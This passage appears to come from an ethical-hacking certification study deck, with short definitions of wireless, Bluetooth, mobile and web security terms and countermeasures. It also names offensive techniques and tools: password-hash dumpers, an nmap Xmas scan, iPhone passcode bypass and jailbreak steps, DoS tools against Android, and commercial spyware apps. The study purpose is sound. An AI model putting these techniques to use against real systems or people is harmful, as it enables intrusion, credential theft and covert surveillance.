o Use SSID cloaking to keep certain default wireless messages from broadcasting the ID to everyone. o Do not use your SSID, company name, network name, or any easy to guess string in passphrases. o Place a firewall or packet filter in between the AP and the corporate Intranet. o Limit the strength of the wireless network so it cannot be detected outside the bounds of your organization. o Check the wireless devices for configuration or setup problems regularly. o Implement an additional technique for encrypting traffic, such as IPSEC over wireless.
Broken Authentication and Session Management Countermeasures
o Use SSL for all authenticated parts of the application o Verify whether all the users' identities and credentials are stored in a hashed form o Never submit session data as part of a GET, POST
How to Defend Against Bluetooth Hacking
o Use non-regular patterns as PIN keys while pairing a device. Use those key combinations which are non-sequential on the keypad. o Keep BT in the disabled state, enable it only when needed and disable immediately after the intended task is completed. o Keep the device in non-discoverable (hidden) mode. o DO NOT accept any unknown and unexpected request for pairing your device. o Keep a check of all paired devices in the past from time to time and delete any paired device that you are not sure about. o Always enable encryption when establishing BT connection to your PC. o Set Bluetooth-enabled device network range to the lowest and perform pairing only in a secure area. o Install antivirus that supports host-based security software on Bluetooth-enabled devices. o Change the default settings of the Bluetooth-enabled device to a best security standard. o Use Link Encryption for all Bluetooth connections. o If multiple wireless communications are being used, make sure that encryption is empowered on each link in the communication chain.
Insecure Deserialization Countermeasure
o Validate untrusted input which is to be serialized to ensure serialized data contains only trusted classes o Deserialization of trusted data must cross a trust boundary o Developers must re-architect their applications o Avoid serialization for security-sensitive classes o Guard sensitive data during deserialization o Filter untrusted serial data o Duplicate Security Manager checks enforced in a class during serialization and deserialization o Understand the security permissions given to serialization and deserialization
Types of Wireless enryption
o WEP (Wired Equivalent Privacy) - an encryption algorithm for IEEE 802.11 wireless networks. It is an old and original wireless security standard, which can be cracked easily. o WPA (Wi-Fi Protected Access) - It is an advanced wireless encryption protocol using TKIP and MIC to provide stronger encryption and authentication. It uses a 48 bit IV, 32 bit CRC and TKIP encryption for wireless security. o WPA2 - It is an upgrade to WPA using AES and CCMP for wireless data encryption
Masquerading
refers to convincing personnel to grant access to sensitive information or protected systems by pretending to be someone who is authorized and/or requires that access.
What is Data Loss Prevention (DLP)?
refers to the identification and monitoring of sensitive data to ensure that end users do not send sensitive information outside the corporate network.
Host Integrity Monitoring
process of studying the changes that have taken place across a system or a machine after a series of actions or incidents. Involves taking a snapshot of the system state using the same tools before and after the analysis to detect changes made to the entitles residing on the system Port monitoring Process Monitoring Registry monitoring Windows Services monitoring Startup programs monitoring Event logs monitoring/analysis Installation monitoring Files and folder monitoring Device drivers monitoring Network traffic monitoring/analysis DNS monitoring/resolution API calls monitoring
Federal Information Security Management Act (FISMA)
provides a comprehensive framework for ensuring the effectiveness of information security controls over information resources that support federal operations and assets. It requires each federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or other source.
Unix/Linux User Enumeration
provides list of users along with details like user name, host name, start date and time of each session, etc. Commands used for this -rusers -rwho -finger
Tools for extracting Password Hashes
pwdump7-extracts LM and NTLM password hashes of local user accounts from the SAM database tool runs by extracting the binary SAM and SYSTEM File from the file system, and then extracts the hashes. One of the powerful features of pwdump7 is that it is also capable of dumping protected files. Pwdump7 is also able to extract passwords offline by selecting the target files. Use of this program requires administrative privileges on the remote system. fgdump-works like pwdump but also extracts cached credentials and allows remote network execution
Command and control warfare (C2 warfare):
refers to the impact an attacker possesses over a compromised system or network that they control.
linux- command that displays a list of users who are logged in to hosts on the local network
rwho
Xmas Scan
scan is a port scan technique with FIN, URG, and PUSH flags set to send a TCP frame to a remote device -Open gives no response. Closed gives RST/ACK -named because all flags are turned on so it's "lit up" like a Christmas tree -This scan only works when systems are compliant with RFC 793-based TCP/IP implementation. It will not work against any current version of Microsoft Windows. nmap -sX
NetBIOS code: 20
server service running
LDAP enumeration
service to gather information such as valid user names, addresses, departmental details, and so on that can be further used to perform attacks. -Directory services may provide any organized set of records such as corporate e-mail directory, often in a hierarchical and logical structure
Bot
software applications that run automated tasks over the Internet Attackers use these for benign data collection or data mining, such as "Web spidering," as well as to coordinate DoS attacks. Attackers use these to infect a large number of computers that form a network, or "botnet," allowing them to launch DDoS attacks, generate spam, spread viruses, and commit other types of crime. There are different types of bots, such as Internet bots, IRC bots, and chatter bots. -IRC bots - Eggdrop, Winbot, Supybot, Infobot, and EnergyMech
Keylogger
software programs or hardware devices that record the keys struck on the computer keyboard (also called keystroke logging) of an individual computer user or a network of computers
NetBIOS Enumeration
stands for Network Basic Input Output System -16 character ASCII string used to identify the network devices over TCP/IP; 15 characters are used for the device name and the 16th is reserved for the service or name record type Used For List of computers that belong to a domain List of shares on the individual hosts in the network Policies and passwords Attackers usually target the NetBIOS service, as it is easy to exploit and runs on Windows systems even when not in use.
Displays all TCP resets and words containing traffic
tcp.flags.reset==1 tcp contains traffic
Evasion Technique: Manipulating White Spaces
technique obfuscates input strings by dropping or adding white spaces between SQL keyword and string or number literals without altering execution of SQL statements. Adding white spaces using special characters such as tab, carriage return, or linefeeds makes an SQL statement completely untraceable without changing the execution of the statement
what is SMTP EXPN
tells the actual addresses of aliases or mailing groups
Confidentiality
the assurance that the information is accessible only to those who are authorized to have access
Zero-day attack
the attacker exploits vulnerabilities in a computer application before the software developer can release a patch for them.
Scanning
the process of gathering additional detailed information about the target by using highly complex and aggressive reconnaissance techniques. Network scanning refers to a set of procedures used for identifying hosts, ports, and services in a network.
User Behavior Analytics (UBA)
the process of tracking user behavior to detect malicious attacks, potential threats, and financial frauds.
Hacker warfare:
the purpose of this type of warfare can vary from shutdown of systems, data errors, theft of information, theft of services, system monitoring, false messaging, and access to data. -They generally use viruses, logic bombs, Trojan horses, and sniffers to perform these attacks
Integrity
the trustworthiness of data or resources in the prevention of improper and unauthorized changes—the assurance that information is sufficiently accurate for its purpose
Cyber warfare
the use of information systems against the virtual personas of individuals or groups. instead of harming a system, it takes the system over and the system will be perceived as operating correctly
Psychological warfare
the use of various techniques such as propaganda and terror to demoralize one's adversary in an attempt to succeed in the battle.
Setuid and Setgid
uses setuid or setgid then the application will execute with the privileges of the owning user or group respectively An attacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges.
Enumerating User Accounts
using PsTools suite helps to control and manage remote systems from the command line PsExec - is a lightweight telnet-replacement that can execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsFile - command-line utility that shows a list of files on a system that opened remotely, and it can close opened files either by name or by a file identifier. PsGetSid - translates SIDs to their display name and vice versa PsKill - is a kill utility that can kill processes on remote systems and terminate processes on the local computer. PsInfo - is a command-line tool that gathers key information about local or remote legacy Windows NT/2000 systems PsList - is a command-line tool that displays information about process CPU and memory information or thread statistics. PsLoggedOn - is an applet that displays both the locally logged on users and users logged on via resources for either the local computer or a remote one PsLogLis - The elogdump utility dumps the contents of an Event Log on a local or remote computer. PsPasswd - can change an account password on local or remote systems, enabling administrators to create batch file PsShutdown - can shut down or reboot local or remote computer. It requires no manual installation of client software
Sparse Infector Viruses
viruses infect less often and try to minimize the probability of discovery. This viruses infect only occasionally upon satisfying certain conditions or only files whose lengths fall within a narrow range Virus infects only occasionally or only files whose lengths fall within a narrow range By infecting less often, such viruses try to minimize the probability of being discovered
iPhone Pen Testing
o Jailbreak the iPhone -Try to Jailbreak the iPhone using tools such as Cydia, Anzhuang, and so on. o Unlock the iPhone -Unlock the iPhone using tools such as iPhoneSimFree. o Use SmartCover to bypass passcode -Hold the power button of an iOS operating device until the power off message appears. Close the smart cover until the screen shuts down and opens the smart cover after few seconds. Press the cancel button to bypass the password code security. o Hack iPhone using Metasploit -Use the Metasploit tool to exploit the vulnerabilities in iPhone. Try to send malicious code as payload to the device to gain access to the device. o Check for access point -Setup an access point with the same name and encryption type. o Check iOS device data transmission on Wi-Fi networks -Perform MITM/SSL stripping attack by intercepting wireless parameters of iOS device on Wi-Fi network. Send malicious packets on Wi-Fi network using Cain & Abel tool. o Check whether the malformed data can be sent to the device -Use social engineering techniques such as sending emails and SMSs to trick the user to open links that contain malicious web pages.
Jailbreaking Tools
o Keen Jainbreak - unofficial Semi-tethered tool that was released for iOS 11 beta versions o Yalu o Velonzy o Pangu9 Jailbreak o TaiG o Pangu o JAILBREAK o Redsn0w o evasi0n7 o Geeksn0w o Sn0wbreeze o LimeRa1n o Blackra1n
Mobile Device Management Solutions
o MaaS360 - supports the complete MDM lifecycle for smartphones and tablets including iPhone, iPad, Android, Windows Phone, BlackBerry, and Kindle Fire o Citrix XenMobile contains MDM - mobile application management (MAM), mobile content management (MCM), secure network gateway, and enterprise-grade mobile productivity apps in one comprehensive enterprise mobility management solution. o VMware AirWatch o Sicap Device Management Centre o SOTI MobiControl o MobiLock Pro o ManageEngine Mobile Device Manager Plus o MobileIron's Mobile device management o Tangoe MDM
Mobile Platform Vulnerabilities and Risks
o Malicious apps in stores o Mobile malware o App sandboxing vulnerabilities o Weak device and app encryption o OS and app updates' issues o Jailbreaking and rooting o Mobile application vulnerabilities o Privacy issues (Geolocation) o Weak data security o Excessive permissions o Weak communication security o Physical attacks
Mobile Attack Vectors
o Malware o Data Ex filtration o Data Tampering o Data loss
Additional Mobile Protection Tools
o McAfee Mobile Security o Kaspersky Internet Security for Android o AVG AntiVirus Pro for Android o F-Secure Mobile Security o Avast Mobile Security o Trend Micro Mobile Security for Android o Norton Mobile Security o Comodo Mobile Security o ESET Mobile Security o Bitdefender Mobile Security o Sophos Mobile Security for Android o WISeID
SMS Phishing Countermeasures
o Never reply to a suspicious SMS without verifying the source o Do not click on any links included in the SMS o Never reply to a SMS that requires personal and financial information from you o Review the bank's policy on sending SMS o Enable the "block texts from the internet" feature from your provider o Never reply to a SMS that urges you to act or respond quickly o Never call a number left in a SMS o Do not fall for scams, gifts, and offers that seem to be unexpected o Attackers might send text messages through an Internet text relay service to conceal their identity; thus, it is best to avoid messages from nontelephonic numbers o Check for spelling mistakes, grammatical errors, or language inconsistency in text messages
The System Point of Attack
o No passcode/ weak passcode o iOS Jailbreaking o Android Rooting o OS data caching o Passwords and data accessible o Carrier-loaded software o User-initiated code
Android-based Sniffers
o Packet Sniffer o tPacketCapture o Android PCAP o Wicap. Sniffer Demo [ROOT] o Testeldroid o Postern o WiFinspect [Root] o SniffDroid
Cloud: Web server-based attacks
o Platform vulnerabilities o Server misconfiguration o Cross site scripting o Cross site request forgery o Weak input validation o Weak input validation o Brute force attacks
Android Phone Pen Testing
o Root an Android Phone -Try to Root an Android Phone to gain the administrative access to the Android devices using tools such as Kingo Android ROOT, TunesGo Root Android Tool, and so on. o Perform DoS and DDoS Attacks -Use tool LOIC, AnDOSid to perform DoS and DDoS attacks on Android phone. o Check for vulnerabilities in Android browser -Check whether cross-application-scripting error is present in the Android browser that allows hackers to easily hack the Android device and try to break down the web browser's sandbox using infected java script code. o Check for vulnerabilities in SQLite -Check whether email password is stored as plain text in the SQLite database and also check whether Skype on Android uses unencrypted SQLite database to store contacts, profile information and instant message logs. o Check for vulnerabilities in Intents -Try to exploit Android Intents to obtain the user's private information. You can use apset tool to detect application's communication vulnerabilities. o Detect capability leaks in Android devices -Use tool Co Checker, IntentFuzzer, and so on to detect capability leaks in Android devices.
Application based Point of Attack
o Sensitive data storage o No encryption/ weak encryption o Improper SSL Validation o Configuration manipulation o Dynamic runtime injection o Unintended permissions o Escalated Privileges
(Bring Your Own Device) BYOD Risks
o Sharing confidential data on unsecured network o Data leakage and endpoint security issues o Improperly disposing device o Support of many different devices o Mixing personal and private data o Lost or stolen devices o Lack of awareness o Ability to bypass organizations network policy rules o Infrastructure issues o Disgrunted employees
Mobile Spyware Applications
o Spyera o Highster Mobile o TeenSafe o MobiStealth o TheTruthSpy o FlexiSpy o mSpy
Basic Features of MDM software
o Use of a passcode to the device o Remotely lock the device if lost o Remotely wipe data in the lost or stolen device o Detects if the device is rooted or jailbroken o Enforce policies and track inventory o Perform real time monitoring and reportin
General Guidelines for Mobile Platform Security
o Use passcode o Update OS and Apps o Enable remote management and use remote wipe services o Do not allow Rooting or Jailbreaking o Encrypt storage o Perform periodic backup and synchronization o Filter e-mail forwarding barriers o Configure Application certification rules o Harden browser permission rules o Design and implement mobile device policies
